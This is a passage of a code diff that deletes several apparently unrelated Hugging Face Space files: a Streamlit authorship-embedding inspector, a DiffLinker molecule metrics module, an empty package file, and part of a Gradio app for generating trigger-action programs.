allow_output_mutation=True) -def annotate_text(text, words): - annotated = [text] - for word in words: - for i in range(len(annotated)): - if type(annotated[i]) != str: - continue - string = annotated[i] - try: - index = string.index(word) - except: - continue - first = string[:index] - second = (string[index:index+len(word)],'SIMILAR') - third = string[index+len(word):] - annotated = annotated[:i] + [first, second, third] + annotated[i+1:] - return tuple(annotated) - - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def preprocess_text(s): - return list(filter(lambda x: x!= '', (''.join(c if c.isalnum() or c == ' ' else ' ' for c in s)).split(' '))) - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_pairwise_distances(model): - df = pd.read_csv(f"{ASSETS_PATH}/{model}/pairwise_distances.csv").set_index('index') - return df - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_pairwise_distances_chunked(model, chunk): - # for df in pd.read_csv(f"{ASSETS_PATH}/{model}/pairwise_distances.csv", chunksize = 16): - # print(df.iloc[0]['queries']) - # if chunk == int(df.iloc[0]['queries']): - # return df - return get_pairwise_distances(model) -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_query_strings(): - df = pd.read_json(f"{ASSETS_PATH}/IUR_Reddit_test_queries_english.jsonl", lines = True) - df['index'] = df.reset_index().index - return df - # df['partition'] = df['index']%100 - # df.to_parquet(f"{ASSETS_PATH}/IUR_Reddit_test_queries_english.parquet", index = 'index', partition_cols = 'partition') - - # return pd.read_parquet(f"{ASSETS_PATH}/IUR_Reddit_test_queries_english.parquet", columns=['fullText', 
'index', 'authorIDs']) -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_candidate_strings(): - df = pd.read_json(f"{ASSETS_PATH}/IUR_Reddit_test_candidates_english.jsonl", lines = True) - df['i'] = df['index'] - df = df.set_index('i') - # df['index'] = df.reset_index().index - - return df - # df['partition'] = df['index']%100 - # df.to_parquet(f"{ASSETS_PATH}/IUR_Reddit_test_candidates_english.parquet", index = 'index', partition_cols = 'partition') - # return pd.read_parquet(f"{ASSETS_PATH}/IUR_Reddit_test_candidates_english.parquet", columns=['fullText', 'index', 'authorIDs']) -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_embedding_dataset(model): - data = load_from_disk(f"{ASSETS_PATH}/{model}/embedding") - return data -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_bad_queries(model): - df = get_query_strings().iloc[list(get_pairwise_distances(model)['queries'].unique())][['fullText', 'index', 'authorIDs']] - return df -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_gt_candidates(model, author): - gt_candidates = get_candidate_strings() - df = gt_candidates[gt_candidates['authorIDs'] == author] - return df -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_candidate_text(l): - return get_candidate_strings().at[l,'fullText'] - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_annotated_text(text, word, pos): - print("here", word, pos) - start= text.index(word, pos) - end = start+len(word) - return (text[:start], (text[start:end ], 'SELECTED'), text[end:]), end - -# class AgGridBuilder: -# __static_key = 0 -# def build_ag_grid(table, display_columns): -# AgGridBuilder.__static_key += 1 -# options_builder = GridOptionsBuilder.from_dataframe(table[display_columns]) -# options_builder.configure_pagination(paginationAutoPageSize=False, paginationPageSize=10) -# options_builder.configure_selection(selection_mode= 'single', pre_selected_rows = [0]) -# options = options_builder.build() -# return AgGrid(table, gridOptions = options, fit_columns_on_grid_load=True, key = AgGridBuilder.__static_key, reload_data = True, update_mode = GridUpdateMode.SELECTION_CHANGED | GridUpdateMode.VALUE_CHANGED) - -if __name__ == '__main__': - st.set_page_config(layout="wide") - - models = filter(lambda file_name: os.path.isdir(f"{ASSETS_PATH}/{file_name}") and not file_name.endswith(".parquet"), os.listdir(ASSETS_PATH)) - - with st.sidebar: - current_model = st.selectbox( - "Select Model to analyze", - models - ) - - pairwise_distances = get_pairwise_distances(current_model) - embedding_dataset = get_embedding_dataset(current_model) - - candidate_string_grid = None - gt_candidate_string_grid = None - with st.container(): - t1 = time.time() - st.title("Full Text") - col1, col2 = st.columns([14, 2]) - t2 = time.time() - query_table = get_bad_queries(current_model) - t3 = time.time() - print(query_table) - with col2: - index = st.number_input('Enter Query number to inspect', min_value = 0, max_value = query_table.shape[0], step = 1) - query_text = query_table.loc[index]['fullText'] - preprocessed_query_text = preprocess_text(query_text) - text_highlight_index = st.number_input('Enter word #', min_value = 0, max_value = len(preprocessed_query_text), step = 1) - query_index = int(query_table.iloc[index]['index']) - - with col1: - if 'pos_highlight' not in st.session_state or text_highlight_index == 0: - st.session_state['pos_highlight'] = text_highlight_index - 
st.session_state['pos_history'] = [0] - - if st.session_state['pos_highlight'] > text_highlight_index: - st.session_state['pos_history'] = st.session_state['pos_history'][:-2] - if len(st.session_state['pos_history']) == 0: - st.session_state['pos_history'] = [0] - print("pos", st.session_state['pos_history'], st.session_state['pos_highlight'], text_highlight_index) - anotated_text_, pos = get_annotated_text(query_text, preprocessed_query_text[text_highlight_index-1], st.session_state['pos_history'][-1]) if text_highlight_index >= 1 else ((query_text), 0) - if st.session_state['pos_highlight'] < text_highlight_index: - st.session_state['pos_history'].append(pos) - st.session_state['pos_highlight'] = text_highlight_index - annotated_text(*anotated_text_) - # annotated_text("Lol, this" , ('guy', 'SELECTED') , "is such a PR chameleon. \n\n In the Chan Zuckerberg Initiative announcement, he made it sound like he was giving away all his money to charity or . http://www.businessinsider.in/Mark-Zuckerberg-says-hes-giving-99-of-his-Facebook-shares-45-billion-to-charity/articleshow/50005321.cms Apparently, its just a VC fund. And there are still people out there who believe Facebook.org was an initiative to bring Internet to the poor.") - t4 = time.time() - - print(f"query time query text: {t3-t2}, total time: {t4-t1}") - with st.container(): - st.title("Top 16 Recommended Candidates") - col1, col2, col3 = st.columns([10, 4, 2]) - rec_candidates = pairwise_distances[pairwise_distances["queries"]==query_index]['candidates'] - print(rec_candidates) - l = list(rec_candidates) - with col3: - candidate_rec_index = st.number_input('Enter recommended candidate number to inspect', min_value = 0, max_value = len(l), step = 1) - print("l:",l, query_index) - pairwise_candidate_index = int(l[candidate_rec_index]) - with col1: - st.header("Text") - t1 = time.time() - candidate_text = get_candidate_text(pairwise_candidate_index) - - if st.session_state['pos_highlight'] == 0: - annotated_text(candidate_text) - else: - top_n_words_to_highlight = get_top_n_closest(preprocessed_query_text[text_highlight_index-1], candidate_text, 4) - print("TOPN", top_n_words_to_highlight) - annotated_text(*annotate_text(candidate_text, top_n_words_to_highlight)) - - t2 = time.time() - with col2: - st.header("Cosine Distance") - st.write(float(pairwise_distances[\ - ( pairwise_distances['queries'] == query_index ) \ - & - ( pairwise_distances['candidates'] == pairwise_candidate_index)]['distances'])) - print(f"candidate string retreival: {t2-t1}") - with st.container(): - t1 = time.time() - st.title("Candidates With Same Authors As Query") - col1, col2, col3 = st.columns([10, 4, 2]) - t2 = time.time() - gt_candidates = get_gt_candidates(current_model, query_table.iloc[query_index]['authorIDs'][0]) - t3 = time.time() - - with col3: - candidate_index = st.number_input('Enter ground truthnumber to inspect', min_value = 0, max_value = gt_candidates.shape[0], step = 1) - print(gt_candidates.head()) - gt_candidate_index = int(gt_candidates.iloc[candidate_index]['index']) - with col1: - st.header("Text") - st.write(gt_candidates.iloc[candidate_index]['fullText']) - with col2: - t4 = time.time() - st.header("Cosine Distance") - indices = list(embedding_dataset['candidates']['index']) - st.write(1-cosine_similarity(np.array([embedding_dataset['queries'][query_index]['embedding']]), np.array([embedding_dataset['candidates'][indices.index(gt_candidate_index)]['embedding']]))[0,0]) - t5 = time.time() - print(f"find gt candidates: {t3-t2}, find 
cosine: {t5-t4}, total: {t5-t1}") diff --git a/spaces/igashov/DiffLinker/src/metrics.py b/spaces/igashov/DiffLinker/src/metrics.py deleted file mode 100644 index efba0c8e3d316695a53d8ab1db0ee746ffbc13fe..0000000000000000000000000000000000000000 --- a/spaces/igashov/DiffLinker/src/metrics.py +++ /dev/null @@ -1,167 +0,0 @@ -import numpy as np - -from rdkit import Chem -from rdkit.Chem import AllChem -from src import const -from src.molecule_builder import get_bond_order -from scipy.stats import wasserstein_distance - -from pdb import set_trace - - -def is_valid(mol): - try: - Chem.SanitizeMol(mol) - except ValueError: - return False - return True - - -def is_connected(mol): - try: - mol_frags = Chem.GetMolFrags(mol, asMols=True) - except Chem.rdchem.AtomValenceException: - return False - if len(mol_frags) != 1: - return False - return True - - -def get_valid_molecules(molecules): - valid = [] - for mol in molecules: - if is_valid(mol): - valid.append(mol) - return valid - - -def get_connected_molecules(molecules): - connected = [] - for mol in molecules: - if is_connected(mol): - connected.append(mol) - return connected - - -def get_unique_smiles(valid_molecules): - unique = set() - for mol in valid_molecules: - unique.add(Chem.MolToSmiles(mol)) - return list(unique) - - -def get_novel_smiles(unique_true_smiles, unique_pred_smiles): - return list(set(unique_pred_smiles).difference(set(unique_true_smiles))) - - -def compute_energy(mol): - mp = AllChem.MMFFGetMoleculeProperties(mol) - energy = AllChem.MMFFGetMoleculeForceField(mol, mp, confId=0).CalcEnergy() - return energy - - -def wasserstein_distance_between_energies(true_molecules, pred_molecules): - true_energy_dist = [] - for mol in true_molecules: - try: - energy = compute_energy(mol) - true_energy_dist.append(energy) - except: - continue - - pred_energy_dist = [] - for mol in pred_molecules: - try: - energy = compute_energy(mol) - pred_energy_dist.append(energy) - except: - continue - - if len(true_energy_dist) > 0 and len(pred_energy_dist) > 0: - return wasserstein_distance(true_energy_dist, pred_energy_dist) - else: - return 0 - - -def compute_metrics(pred_molecules, true_molecules): - if len(pred_molecules) == 0: - return { - 'validity': 0, - 'validity_and_connectivity': 0, - 'validity_as_in_delinker': 0, - 'uniqueness': 0, - 'novelty': 0, - 'energies': 0, - } - - # Passing rdkit.Chem.Sanitize filter - true_valid = get_valid_molecules(true_molecules) - pred_valid = get_valid_molecules(pred_molecules) - validity = len(pred_valid) / len(pred_molecules) - - # Checking if molecule consists of a single connected part - true_valid_and_connected = get_connected_molecules(true_valid) - pred_valid_and_connected = get_connected_molecules(pred_valid) - validity_and_connectivity = len(pred_valid_and_connected) / len(pred_molecules) - - # Unique molecules - true_unique = get_unique_smiles(true_valid_and_connected) - pred_unique = get_unique_smiles(pred_valid_and_connected) - uniqueness = len(pred_unique) / len(pred_valid_and_connected) if len(pred_valid_and_connected) > 0 else 0 - - # Novel molecules - pred_novel = get_novel_smiles(true_unique, pred_unique) - novelty = len(pred_novel) / len(pred_unique) if len(pred_unique) > 0 else 0 - - # Difference between Energy distributions - energies = wasserstein_distance_between_energies(true_valid_and_connected, pred_valid_and_connected) - - return { - 'validity': validity, - 'validity_and_connectivity': validity_and_connectivity, - 'uniqueness': uniqueness, - 'novelty': novelty, - 'energies': 
energies, - } - - -# def check_stability(positions, atom_types): -# assert len(positions.shape) == 2 -# assert positions.shape[1] == 3 -# x = positions[:, 0] -# y = positions[:, 1] -# z = positions[:, 2] -# -# nr_bonds = np.zeros(len(x), dtype='int') -# for i in range(len(x)): -# for j in range(i + 1, len(x)): -# p1 = np.array([x[i], y[i], z[i]]) -# p2 = np.array([x[j], y[j], z[j]]) -# dist = np.sqrt(np.sum((p1 - p2) ** 2)) -# atom1, atom2 = const.IDX2ATOM[atom_types[i].item()], const.IDX2ATOM[atom_types[j].item()] -# order = get_bond_order(atom1, atom2, dist) -# nr_bonds[i] += order -# nr_bonds[j] += order -# nr_stable_bonds = 0 -# for atom_type_i, nr_bonds_i in zip(atom_types, nr_bonds): -# possible_bonds = const.ALLOWED_BONDS[const.IDX2ATOM[atom_type_i.item()]] -# if type(possible_bonds) == int: -# is_stable = possible_bonds == nr_bonds_i -# else: -# is_stable = nr_bonds_i in possible_bonds -# nr_stable_bonds += int(is_stable) -# -# molecule_stable = nr_stable_bonds == len(x) -# return molecule_stable, nr_stable_bonds, len(x) -# -# -# def count_stable_molecules(one_hot, x, node_mask): -# stable_molecules = 0 -# for i in range(len(one_hot)): -# mol_size = node_mask[i].sum() -# atom_types = one_hot[i][:mol_size, :].argmax(dim=1).detach().cpu() -# positions = x[i][:mol_size, :].detach().cpu() -# stable, _, _ = check_stability(positions, atom_types) -# stable_molecules += int(stable) -# -# return stable_molecules diff --git a/spaces/ilmhona/api/__init__.py b/spaces/ilmhona/api/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/imamnurby/RecipeGen/app.py b/spaces/imamnurby/RecipeGen/app.py deleted file mode 100644 index b570dc56fc3acdeb1e2d29b76a2731d35a978444..0000000000000000000000000000000000000000 --- a/spaces/imamnurby/RecipeGen/app.py +++ /dev/null @@ -1,543 +0,0 @@ -import pandas as pd -from transformers import AutoTokenizer -from transformers import RobertaTokenizer, EncoderDecoderModel -import gradio as gr -import string -from utils import (get_metadata, - append_prefix, - append_suffix, - process_field) - -metadata = "metadata.csv" -channel_dict, function_dict_trigger, function_dict_action, field_mapping, valid_field, channel_to_function_dict = get_metadata(path=metadata) - -tokenizer = RobertaTokenizer.from_pretrained("imamnurby/rob2rand_merged_w_prefix_c_fc_field") - -model_oneshot = EncoderDecoderModel.from_pretrained("imamnurby/rob2rand_merged_w_prefix_c_fc_field") -model_interactive = EncoderDecoderModel.from_pretrained("imamnurby/rob2rand_merged_w_prefix_c_fc_interactive") - - -### -# INTERACTIVE GENERATION FUNCTIONS -### -def return_same(input_desc): - return input_desc - -def update_dropdown_trig_ch(df_result): - list_result = [] - answer = '' - for ind in df_result.index: - if str(df_result['No.'][ind]) != '': - answer = str(df_result['No.'][ind])+ ' - '+ str(df_result['Trigger Channel'][ind]) - list_result.append(answer) - return gr.Dropdown.update(choices=list_result) - -def update_dropdown_trig_func(df_result): - list_result = [] - answer = '' - for ind in df_result.index: - if str(df_result['No.'][ind]) != '': - answer = str(df_result['No.'][ind])+ ' - '+ str(df_result['Trigger Function'][ind]) - list_result.append(answer) - return gr.Dropdown.update(choices=list_result) - -def update_dropdown_action_ch(df_result): - list_result = [] - answer = '' - for ind in df_result.index: - if str(df_result['No.'][ind]) != '': - answer = str(df_result['No.'][ind])+ ' - '+ 
str(df_result['Action Channel'][ind]) - list_result.append(answer) - return gr.Dropdown.update(choices=list_result) - -def update_dropdown_action_func(df_result): - list_result = [] - answer = '' - for ind in df_result.index: - if str(df_result['No.'][ind]) != '': - answer = str(df_result['No.'][ind])+ ' - '+ str(df_result['Action Function'][ind]) - list_result.append(answer) - return gr.Dropdown.update(choices=list_result) - -def set_trigger_ch(df_result, string_chosen): - index_chosen = string_chosen[0:1] - index_chosen = int(index_chosen) - return gr.Textbox.update(value = df_result.iloc[index_chosen-1]["Trigger Channel"]) - -def set_trig_func(df_result, string_chosen): - index_chosen = string_chosen[0:1] - index_chosen = int(index_chosen) - return gr.Textbox.update(value = df_result.iloc[index_chosen-1]["Trigger Function"]) - -def set_action_ch(df_result, string_chosen): - index_chosen = string_chosen[0:1] - index_chosen = int(index_chosen) - return gr.Textbox.update(value = df_result.iloc[index_chosen-1]["Action Channel"]) - -def set_final_result(tf, df_result, string_chosen): - index_chosen = string_chosen[0:1] - index_chosen = int(index_chosen) - af = df_result.iloc[index_chosen-1]["Action Function"] - tf_field = field_mapping.get(tf, "()") - tf = tf + tf_field - af_field = field_mapping.get(af, "()") - af = af + af_field - df_dict = {"Trigger": [tf], - "Action": [af]} - return pd.DataFrame(df_dict) - -def generate_preds_tc(input_desc, n_beams_interactive): - count_arr = [] - decoded_preds=[] - descriptions=[] - if input_desc!='': - desc = input_desc.lower() - desc = append_prefix(desc=desc, - prefix= "GENERATE TRIGGER CHANNEL ") - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - preds = model_interactive.generate(input_ids, - max_length=200, - num_beams=n_beams_interactive, - num_return_sequences=n_beams_interactive, - early_stopping=True) - count = 0 - for item in preds: - temp_pred = (tokenizer.decode(item, skip_special_tokens=True)) - if temp_pred in channel_dict.keys(): - count = count + 1 - count_arr.append(count) - decoded_preds.append(temp_pred) - temp_desc = channel_dict.get(temp_pred, "null") - descriptions.append(temp_desc) - - df = {'No.':count_arr, - 'Trigger Channel': decoded_preds, - 'Description': descriptions} - return pd.DataFrame(df) - -def generate_preds_tf(input_desc, n_beams_interactive, selected_tc): - count_arr = [] - decoded_preds=[] - descriptions=[] - if input_desc!='' and selected_tc!='': - desc = input_desc.lower() - desc = append_prefix(desc=desc, - prefix="GENERATE TRIGGER FUNCTION ") - - desc = append_suffix(desc=desc, - suffix=f" {selected_tc}") - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - preds = model_interactive.generate(input_ids, - max_length=200, - num_beams=n_beams_interactive, - num_return_sequences=n_beams_interactive, - early_stopping=True) - count = 0 - for item in preds: - temp_pred = (tokenizer.decode(item, skip_special_tokens=True)) - if temp_pred in function_dict_trigger.keys(): - temp_desc = function_dict_trigger.get(temp_pred, "null") - if selected_tc in temp_pred: - count = count + 1 - count_arr.append(count) - decoded_preds.append(temp_pred) - descriptions.append(temp_desc) - - df = {'No.': count_arr, - 'Trigger Function': decoded_preds, - 'Description': descriptions} - return pd.DataFrame(df) - -def generate_preds_ac(input_desc, n_beams_interactive, selected_tc, selected_tf): - count_arr = [] - decoded_preds=[] - descriptions=[] - if input_desc!='' and selected_tf!='': - desc = input_desc.lower() - 
desc = append_prefix(desc=desc, - prefix= "GENERATE ACTION CHANNEL ") - - desc = append_suffix(desc=desc, - suffix=f" {selected_tc} {selected_tf}") - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - preds = model_interactive.generate(input_ids, - max_length=200, - num_beams=n_beams_interactive, - num_return_sequences=n_beams_interactive, - early_stopping=True) - count = 0 - for item in preds: - temp_pred = (tokenizer.decode(item, skip_special_tokens=True)) - if temp_pred in channel_dict.keys(): - count = count + 1 - count_arr.append(count) - decoded_preds.append(temp_pred) - temp_desc = channel_dict.get(temp_pred, "null") - descriptions.append(temp_desc) - - df = {'No.':count_arr, - 'Action Channel': decoded_preds, - 'Description': descriptions} - return pd.DataFrame(df) - -def generate_preds_af(input_desc, n_beams_interactive, selected_tc, selected_tf, selected_ac): - count_arr = [] - decoded_preds=[] - descriptions=[] - if input_desc!='' and selected_ac!='': - desc = input_desc.lower() - desc = append_prefix(desc=desc, - prefix="GENERATE TRIGGER FUNCTION ") - - desc = append_suffix(desc=desc, - suffix=f" {selected_tc} {selected_tf} {selected_ac}") - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - preds = model_interactive.generate(input_ids, - max_length=200, - num_beams=n_beams_interactive, - num_return_sequences=n_beams_interactive, - early_stopping=True) - count = 0 - for item in preds: - temp_pred = (tokenizer.decode(item, skip_special_tokens=True)) - if temp_pred in function_dict_action.keys(): - temp_desc = function_dict_action.get(temp_pred, "null") - - if selected_ac in temp_pred: - count = count + 1 - count_arr.append(count) - decoded_preds.append(temp_pred) - descriptions.append(temp_desc) - - df = {'No.':count_arr, - 'Action Function': decoded_preds, - 'Description': descriptions} - df = pd.DataFrame(df) - df.index.names = ['Ranking'] - return df -### - -### -# ONESHOT GENERATION FUNCTIONS -### -def generate_oneshot(input_desc, n_beams_oneshot): - trigger = [] - trigger_desc = [] - action = [] - action_desc = [] - if input_desc!='': - desc = input_desc.lower() - prefix="GENERATE ON THE FIELD-LEVEL GRANULARITY " - desc = append_prefix(desc=desc, - prefix=prefix) - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - # activate beam search and early_stopping - preds = model_oneshot.generate(input_ids, - max_length=200, - num_beams=n_beams_oneshot, - num_return_sequences=n_beams_oneshot, - early_stopping=True) - - decoded_preds = [] - for item in preds: - decoded_preds.append(tokenizer.decode(item, skip_special_tokens=True)) - - for item in decoded_preds: - invalid_field = False - splitted_items = item.split("") - processed = [] - if len(splitted_items)==6: - for idx, subitem in enumerate(splitted_items): - if idx!=2 or idx!=4: - subitem = subitem.strip() - processed.append(subitem) - assert(len(processed)==6) - temp_tf = processed[1] - temp_af = processed[4] - - temp_tf_field = process_field(processed[2]) - for field in temp_tf_field: - if field not in valid_field: - invalid_field = True - break - if invalid_field: - continue - temp_tf_field = "(" + ", ".join(temp_tf_field) + ")" - - temp_af_field = process_field(processed[-1]) - for field in temp_af_field: - if field not in valid_field: - invalid_field = True - break - if invalid_field: - continue - temp_af_field = "(" + ", ".join(temp_af_field) + ")" - - if temp_tf in function_dict_trigger.keys() and temp_af in function_dict_action.keys(): - temp_tf_desc = function_dict_trigger.get(temp_tf) 
- temp_af_desc = function_dict_action.get(temp_af) - - temp_tf = temp_tf + temp_tf_field - temp_af = temp_af + temp_af_field - - trigger.append(temp_tf) - trigger_desc.append(temp_tf_desc) - - action.append(temp_af) - action_desc.append(temp_af_desc) - - df = {"Trigger": trigger, - "Action": action, - "Trigger Description": trigger_desc, - "Action Description": action_desc} - return pd.DataFrame(df) -### - -### -# DISCOVER FUNCTIONS -### -def generate_channel(input_desc, n_beams_discover): - trigger = [] - trigger_func = [] - trigger_desc = [] - action = [] - action_func = [] - action_desc = [] - if input_desc!='': - desc = input_desc.lower() - prefix="GENERATE CHANNEL ONLY WITHOUT FUNCTION " - desc = append_prefix(desc=desc, - prefix=prefix) - - input_ids = tokenizer.encode(desc, return_tensors='pt') - - # activate beam search and early_stopping - preds = model_oneshot.generate(input_ids, - max_length=200, - num_beams=n_beams_discover, - num_return_sequences=n_beams_discover, - early_stopping=True) - - decoded_preds = [] - for item in preds: - decoded_preds.append(tokenizer.decode(item, skip_special_tokens=True)) - - for item in decoded_preds: - channels = item.split("") - channels = [ch.strip() for ch in channels] - if len(channels)==2: - if channels[0] in channel_dict.keys() and channels[1] in channel_dict.keys() and channels[0] in channel_to_function_dict.keys() and channels[1] in channel_to_function_dict.keys(): - temp_tc_desc = channel_dict.get(channels[0]) - trigger_desc.append(temp_tc_desc) - trigger.append(channels[0]) - trigger_func.append(channel_to_function_dict.get(channels[0])) - - temp_ac_desc = channel_dict.get(channels[1]) - action_desc.append(temp_ac_desc) - action.append(channels[1]) - action_func.append(channel_to_function_dict.get(channels[1])) - - df_trigger = pd.DataFrame({"Trigger": trigger, - "Available Functions": trigger_func, - "Trigger Description": trigger_desc}) - - df_action = pd.DataFrame({"Action": action, - "Available Functions": action_func, - "Action Description": action_desc}) - - df_trigger.drop_duplicates(inplace=True) - df_action.drop_duplicates(inplace=True) - - return pd.DataFrame(df_trigger), pd.DataFrame(df_action) - -### -# MAIN GRADIO APP -### -demo = gr.Blocks() -with demo: - gr.Markdown("
    RecipeGen++: An Automated Trigger Action Programs (TAPs) Generator
    ") - # gr.Markdown("This demo allows you to generate TAPs using functionality description described in English. You can learn the working detail of our tool from our paper") - gr.Markdown("
    What is TAP?
    ") - gr.Markdown(""" - TAPs or Trigger Action Programs are event-driven rules used to automate smart devices and/or internet services. - TAPs are written in the form of "IF a {trigger} is satisfied then execute an {action}, where the {trigger} and the {action} correspond to API calls. - TAPs have been used in various use cases, ranging from the home monitoring system to business workflow automation. - """) - gr.Markdown("
    What is RecipeGen++?
    ") - gr.Markdown(""" - *RecipeGen++* is a deep learning-based tool that can assist end-users to generate TAPs using natural language description. - End-users can describe the functionality of the intended TAP, then *RecipeGen++* will generate the TAP candidates based on the given description. - """) - gr.Markdown("
    Working Mode
    ") - gr.Markdown(""" - - Interactive: generate a TAP using a step-by-step wizard - - One-Click: generate a TAP using the one-click button - - Functionality Discovery: discover relevant functionalities from channels with similar functionalities - """) - with gr.Tabs(): - with gr.TabItem("Interactive"): - gr.Markdown("
    Instructions for Interactive Mode
    ") - gr.Markdown("""1. There are 5 generation steps, i.e., generating trigger channel, trigger function, action channel, action function, and the final TAP. - 2. **[STEP 1]** Describe the functionality in the `Functionality Description` text box. Click the `Generate Trigger Channel` button. The channel candidates and their descriptions will show up in the `Trigger Channel Results` table. - 3. **[STEP 2]** Select a trigger channel from the dropdown `Select the Trigger Channel`. Click the `Generate Trigger Function` button. The function candidates and their descriptions will show up in the `Trigger Function Results` table. - 4. **[STEP 3]** Select a trigger function from the dropdown `Select the Trigger Function`. Click the `Generate Action Channel` button. The channel candidates and their descriptions will show up in the `Action Channel Results` table. - 5. **[STEP 4]** Select an action channel from the dropdown `Select the Action Channel`. Click the `Generate Action Function` button. The function candidates and their descriptions will show up in the `Action Function Results` table. - 6. **[STEP 5]** Select an action function from the `Select the Action Function` to generate the final TAP.""") - gr.Markdown(""" NOTE: You can control how many sequences are returned by tuning the `Beam Width` slider. A larger value will cause a longer generation time. - """) - - with gr.Box(): - with gr.Column(): - gr.Markdown("You can describe your own functionality directly in the `Functionality Description` text box or try a description sample from the dropdown below:") - dropdown_example = gr.Dropdown(type ="value", - choices = ["Log to my spreadsheet if motion is detected in the living room","When I am not home, let me know when any motion is detected in my house", "Turn on my Philips lamp every sunset","Update my picture in Twitter when I change my profile picture in Facebook","Save in notes when I create a new bookmark"], - label = "Select a sample functionality descriptions") - button_use_example = gr.Button("Try this sample") - - with gr.Box(): - with gr.Column(): - - gr.Markdown("
    Step 1: Generate Trigger Channels
    ") - textbox_input = gr.Textbox(label="Functionality Description", placeholder="Describe the functionality here") - n_beams_interactive = gr.Slider(minimum=2, maximum=100, value=20, step=1, label="Beam Width") - button_generate_tc = gr.Button("Generate Trigger Channels") - - gr.Markdown("
    ") - gr.Markdown("
    Trigger Channel Results
    ") - table_tc = gr.Dataframe(headers=["No.","Trigger Channel", "Description"], row_count=1) - - with gr.Box(): - with gr.Column(): - - gr.Markdown("
    Step 2: Generate Trigger Functions
    ") - dropdown_tc = gr.Dropdown(label="Select the Trigger Channel",type="value", choices=['']) - textbox_selected_tc = gr.Textbox(value="", visible=False, label="") - button_generate_tf = gr.Button("Generate Trigger Functions") - - gr.Markdown("
    ") - gr.Markdown("
    Trigger Function Results
    ") - table_tf = gr.Dataframe(headers=["No.","Trigger Function", "Description"], row_count=1) - - with gr.Box(): - with gr.Column(): - - gr.Markdown("
    Step 3: Generate Action Channels
    ") - dropdown_tf = gr.Dropdown(label="Select the Trigger Function",type="value", choices=['']) - textbox_selected_tf = gr.Textbox(value="", visible=False, label="") - button_generate_ac = gr.Button("Generate Action Channels") - - gr.Markdown("
    ") - gr.Markdown("
    Action Channel Results
    ") - table_ac = gr.Dataframe(headers=["No.","Action Channel", "Description"], row_count=1) - - with gr.Box(): - with gr.Column(): - gr.Markdown("
    Step 4: Generate Action Functions
    ") - dropdown_ac = gr.Dropdown(label="Select the Action Channel",type="value", choices=['']) - textbox_selected_ac = gr.Textbox(value="", visible=False, label="") - - button_generate_af = gr.Button("Generate Action Functions") - gr.Markdown("
    ") - gr.Markdown("
    Action Function Results
    ") - table_af = gr.Dataframe(headers=["No.","Action Function", "Description"], row_count=1) - - with gr.Box(): - with gr.Column(): - gr.Markdown("
    Step 5: Generate the Final TAP
    ") - dropdown_af = gr.Dropdown(label="Select the Action Function",type="value", choices=['']) - table_final = gr.Dataframe(headers=["Trigger","Action"], row_count=1) - - button_use_example.click(return_same, inputs=[dropdown_example], outputs=[textbox_input]) - button_use_example.click(generate_preds_tc, inputs=[dropdown_example, n_beams_interactive], outputs=[table_tc]) - button_generate_tc.click(generate_preds_tc, inputs=[textbox_input, n_beams_interactive], outputs=[table_tc]) - - table_tc.change(fn=update_dropdown_trig_ch, inputs=[table_tc], outputs=[dropdown_tc]) - dropdown_tc.change(fn=set_trigger_ch, inputs=[table_tc,dropdown_tc], outputs=[textbox_selected_tc]) - button_generate_tf.click(generate_preds_tf, inputs=[textbox_input, n_beams_interactive, textbox_selected_tc], outputs=[table_tf]) - - table_tf.change(fn=update_dropdown_trig_func, inputs=[table_tf], outputs=[dropdown_tf]) - dropdown_tf.change(fn=set_trig_func, inputs=[table_tf,dropdown_tf], outputs=[textbox_selected_tf]) - button_generate_ac.click(generate_preds_ac, inputs=[textbox_input, n_beams_interactive, textbox_selected_tc, textbox_selected_tf], outputs=[table_ac]) - - table_ac.change(fn=update_dropdown_action_ch, inputs=[table_ac], outputs=[dropdown_ac]) - dropdown_ac.change(fn=set_action_ch, inputs=[table_ac,dropdown_ac], outputs=[textbox_selected_ac]) - button_generate_af.click(generate_preds_af, inputs=[textbox_input, n_beams_interactive, textbox_selected_tc, textbox_selected_tf, textbox_selected_ac], outputs=[table_af]) - - table_af.change(fn=update_dropdown_action_func, inputs=[table_af], outputs=[dropdown_af]) - dropdown_af.change(fn=set_final_result, inputs=[textbox_selected_tf, table_af, dropdown_af], outputs=[table_final]) - - with gr.TabItem("One-Click"): - gr.Markdown("
    Instructions for One-Click Mode
    ") - gr.Markdown(""" - 1. Describe the functionality by yourself in the `Functionality Description` text box - 2. Click `Generate TAP` button. The TAP candidates will show up in the `TAP Results` table. The table consists of 4 columns: Trigger, Action, Trigger Description, and Action Description. You can scroll the table horizontally. - """) - gr.Markdown(""" NOTE: You can control how many sequences are returned by tuning the `Beam Width` slider. A larger value will cause a longer generation time.""") - - with gr.Box(): - with gr.Column(): - gr.Markdown("You can describe your own functionality directly in the `Functionality Description` text box or try a description sample from the dropdown below:") - dropdown_example = gr.Dropdown(type ="value", - choices = ["Log to my spreadsheet if motion is detected in the living room","When I am not home, let me know when any motion is detected in my house", "Turn on my Philips lamp every sunset","Update my picture in Twitter when I change my profile picture in Facebook","Save in notes when I create a new bookmark"], - label = "Select a sample functionality description") - button_use_example = gr.Button("Try this sample") - - with gr.Box(): - with gr.Column(): - textbox_input = gr.Textbox(label="Functionality Description", placeholder="Describe the functionality here") - n_beams_oneshot = gr.Slider(minimum=2, maximum=100, value=20, step=1, label="Beam Width") - button_generate_oneshot = gr.Button("Generate TAPs") - - gr.Markdown("
    ") - gr.Markdown("
    TAP Results
